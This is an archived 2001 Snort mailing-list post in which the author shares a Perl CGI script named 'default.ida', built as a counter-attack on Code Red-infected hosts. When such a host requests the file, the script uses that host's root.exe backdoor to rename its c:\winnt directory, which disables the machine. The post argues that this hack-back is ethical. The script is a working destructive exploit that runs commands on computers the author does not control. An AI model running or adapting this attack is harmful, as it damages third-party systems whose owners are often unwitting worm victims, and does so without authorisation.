Snort mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Code Red attacks

From: "F.M. Taylor" <root () uranium indstate edu>
Date: Tue, 18 Sep 2001 15:01:31 -0500 (EST)
This is a "default.ida" script that I am using on a server somewhere.  It
seems to be working, at least some of the time.

Ethical??  Well, it is a script, on a server that I own, and the only way
it will do anything is if you try to access it.  It doesn't activly look
for anything, it just waits for a service request, and then performs the
requested service.  If you don't want this service, don't request it.

If there is a better way to deliver this service after it has been
requested (more elegant code), let me know. 



root@www:/htdocs# cat default.ida

#!/usr/bin/perl
#
$ipAddress = $ENV{'REMOTE_ADDR'};
#
$newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\";
#
system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\&apos; >>codered.txt");
#
print "Content-type: text/html\n\n";
#
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\";>";
print "</HEAD><BODY></BODY>";
print "</HTML>";
#




_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: